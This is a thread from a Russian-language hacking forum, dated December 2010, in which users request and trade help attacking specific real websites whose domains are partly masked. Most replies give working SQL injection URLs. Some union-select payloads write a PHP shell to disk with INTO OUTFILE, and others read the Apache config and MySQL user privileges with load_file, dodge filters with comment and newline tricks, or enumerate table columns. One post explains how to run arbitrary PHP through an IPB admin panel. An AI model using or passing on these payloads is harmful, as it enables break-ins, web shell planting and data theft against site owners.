Старый 16.12.2010, 16:48   #661
Tigger
 
Регистрация: 24.11.2010
Сообщений: 42
Репутация: 11
По умолчанию

Цитата:
Сообщение от aze Посмотреть сообщение
pomoqite shell zalivat..
http://news.***.am/index.php?lg=ru&country=0&view_id=-4313+union+select+1,2,3,4,'evilcode',6,7,8,9,+10+i nto+outfile+'/полный/путь/к/файлу/шелл.php'--+

Осталось найти полный путь к сайту и диру, на которую есть права.

Полный путь можно найти в конфигах апача, к примеру.

Последний раз редактировалось Twost; 16.05.2013 в 09:28..
Tigger вне форума   Ответить с цитированием
Старый 16.12.2010, 18:38   #662
avenu
 
Аватар для avenu
 
Регистрация: 10.07.2010
Сообщений: 36
Репутация: 13
По умолчанию

2 aze
вот путь к конфигу
Код:
http://news.***.am/index.php?lg=ru&country=0&view_id=-4313 union select 1,2,3,load_file('/etc/httpd/conf/httpd.conf'),file_priv,6,7,8,9,10 from mysql.user-- 9
но он нам ничего толкового не дает, можно попробовать поперебирать инклудящиеся конфиги, примерно таким образом /etc/httpd/conf/conf.d/news.conf /etc/httpd/conf/conf.d/news.zvartnots.conf и т.д.
а лучше как-либо заставить серв выплюнуть ошибку с полным путем, либо в идеале пхпинфо найти, я посканил сайт, чет ниче нету подобного =( ну ты попробуй, может у тебя что получится
__________________
С утра и навсегда

Последний раз редактировалось Twost; 16.05.2013 в 09:28..
avenu вне форума   Ответить с цитированием
Старый 21.12.2010, 17:13   #663
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Подскажите, как выполнить php код в админке IPB форума?
Уже всё перерыл, только поверхносное описание нашёл, но нигде не работает как бы я не пытался...
По идее выполнение кода происходит при добавлении новой настройки с ним, но уже час мучаюсь так и ничё не выходит, кто знает как правильно, подскажите плз.

Вот скрин:
http://s016.radikal.ru/i335/1012/ea/8cf0bc3d781d.jpg
Тут мы добавляем настройку (1), далее пишем свой php код, например phpinfo(); (2) я пробовал и <?php phpinfo(); ?> далее жмём на кнопку "создать новую настройку" и ничё не происходит, может быть что то ещё надо? Будьте добры подскажите.
Nightmare вне форума   Ответить с цитированием
Старый 21.12.2010, 17:26   #664
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

точно не помню, если IPB 2.xxx, то по идее надо просто потом ЕЩЕ раз зайти в эту настройку (тыцкнуть), найдя её по названию в списке настроек. Это раз.

<? и ?> там не нужны, т.к. eval. Это два.

Ну и если не добавляется новая настройка, то можно РЕДАКТИРОВАТЬ уже имеющуюся, какую-нибудь левую и редко использующуюся, так же просто вписав туда php-код без <? и ?>. Это типо три

PS: При добавлении настроек лучше заполнить ВСЕ предложенные поля, вполне вероятно где-то ниже, по английски, мелким шрифтом пишет чонить : "Вы не указали название настройки, вам пофигу, а нам приятно ^_^"
Pashkela вне форума   Ответить с цитированием
Старый 21.12.2010, 21:49   #665
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Ковырять все параметры вслепую я и сам знаю, к сожалению.
Мне бы конкретику от людей кто знает\недавно делал.
Nightmare вне форума   Ответить с цитированием
Старый 24.12.2010, 19:22   #666
aze
 
Аватар для aze
 
Регистрация: 14.09.2010
Сообщений: 19
Репутация: -1
По умолчанию

Цитата:
http://www.***.ge/index.php?lang_id=ENG&sec_id=24&info_id=1129
pomoqite raskrutit sqli..filter est tam..
__________________
testinG.1

Последний раз редактировалось Twost; 16.05.2013 в 09:30..
aze вне форума   Ответить с цитированием
Старый 24.12.2010, 19:30   #667
aka_zver
 
Аватар для aka_zver
 
Регистрация: 06.07.2010
Сообщений: 63
Репутация: 37
По умолчанию

Цитата:
Сообщение от aze Посмотреть сообщение
pomoqite raskrutit sqli..filter est tam..
http://www.***.ge/index.php?lang_id=ENG&sec_id=24&info_id=1129+/*!and+mid(version(),1,1)=5*/

Последний раз редактировалось Twost; 16.05.2013 в 09:30..
aka_zver вне форума   Ответить с цитированием
Старый 24.12.2010, 19:43   #668
aze
 
Аватар для aze
 
Регистрация: 14.09.2010
Сообщений: 19
Репутация: -1
По умолчанию

blind ?
druqoy varianti neto ?

ili kto znaet blind sqli pomoqite pojalusta dalse raskrutit..
__________________
testinG.1
aze вне форума   Ответить с цитированием
Старый 24.12.2010, 20:10   #669
v1d0q
 
Аватар для v1d0q
 
Регистрация: 09.07.2010
Сообщений: 91
Репутация: 85
По умолчанию

Код:
http://www.***.ge/index.php?lang_id=ENG&sec_id=24&info_id=-1129+union%0aselect+1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16--+

Последний раз редактировалось Twost; 16.05.2013 в 09:30..
v1d0q вне форума   Ответить с цитированием
Старый 24.12.2010, 20:39   #670
aze
 
Аватар для aze
 
Регистрация: 14.09.2010
Сообщений: 19
Репутация: -1
По умолчанию

Цитата:
http://www.***.ge/index.php?lang_id=ENG&sec_id=24&info_id=-1129+union%0Aselect+1,2,3,4,5,group_concat(0x3a,co lumn_name),7,8,9,10,11,12,13,14,15,16+from+informa tion_schema.columns+where+table_name=sdsaffa--+
i vot zdes filteruetsya to4no =..kak oboyti evo..
__________________
testinG.1

Последний раз редактировалось Twost; 16.05.2013 в 09:30..
aze вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot